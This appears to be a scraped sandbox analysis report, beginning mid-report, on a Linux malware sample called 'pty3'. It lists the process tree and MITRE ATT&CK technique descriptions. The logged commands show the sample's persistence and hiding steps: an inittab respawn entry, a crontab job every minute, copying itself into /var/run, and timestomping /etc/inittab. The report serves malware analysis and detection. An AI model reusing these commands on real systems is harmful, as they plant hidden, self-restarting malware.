Arguments:	sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5319 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5319 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5320 Parent PID: 5319

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5320 Parent PID: 5319

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5321 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5321 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5322 Parent PID: 5321

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5322 Parent PID: 5321

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5323 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5323 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5324 Parent PID: 5323

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5324 Parent PID: 5323

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5325 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5325 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /var/run/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5326 Parent PID: 5325

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5326 Parent PID: 5325

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /var/run/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5327 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5329 Parent PID: 5327

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5329 Parent PID: 5327

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/run/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5332 Parent PID: 5329

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5332 Parent PID: 5329

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5333 Parent PID: 5329

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5333 Parent PID: 5329

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/run/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5334 Parent PID: 5329

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5334 Parent PID: 5329

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5336 Parent PID: 5329

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5338 Parent PID: 5336

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5338 Parent PID: 5336

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5337 Parent PID: 5329

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5337 Parent PID: 5329

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5328 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5328 Parent PID: 5259

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/run/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5330 Parent PID: 5328

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5330 Parent PID: 5328

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5331 Parent PID: 5328

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5331 Parent PID: 5328

General

Start time:	15:42:16
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/run/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5335 Parent PID: 5259

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5335 Parent PID: 5259

General

Start time:	15:42:17
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5339 Parent PID: 5259

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5339 Parent PID: 5259

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5340 Parent PID: 5339

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5340 Parent PID: 5339

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5341 Parent PID: 5259

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5341 Parent PID: 5259

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5342 Parent PID: 5341

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5342 Parent PID: 5341

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5343 Parent PID: 5259

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5343 Parent PID: 5259

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5344 Parent PID: 5343

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5344 Parent PID: 5343

General

Start time:	15:42:18
Start date:	21/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5260 Parent PID: 5228

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5262 Parent PID: 5260

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5262 Parent PID: 5260

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "/bin/uname -n"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5264 Parent PID: 5262

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: uname PID: 5264 Parent PID: 5262

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/uname
Arguments:	/bin/uname -n
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report pty3

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

IRC Packets

System Behavior

Analysis Process: pty3 PID: 5228 Parent PID: 5118

General

Analysis Process: pty3 PID: 5229 Parent PID: 5228

General

Analysis Process: sh PID: 5229 Parent PID: 5228

General

Analysis Process: sh PID: 5230 Parent PID: 5229

General

Analysis Process: pidof PID: 5230 Parent PID: 5229

General

Analysis Process: pty3 PID: 5232 Parent PID: 5228

General

Analysis Process: sh PID: 5232 Parent PID: 5228

General

Analysis Process: sh PID: 5233 Parent PID: 5232

General

Analysis Process: pidof PID: 5233 Parent PID: 5232

General

Analysis Process: pty3 PID: 5236 Parent PID: 5228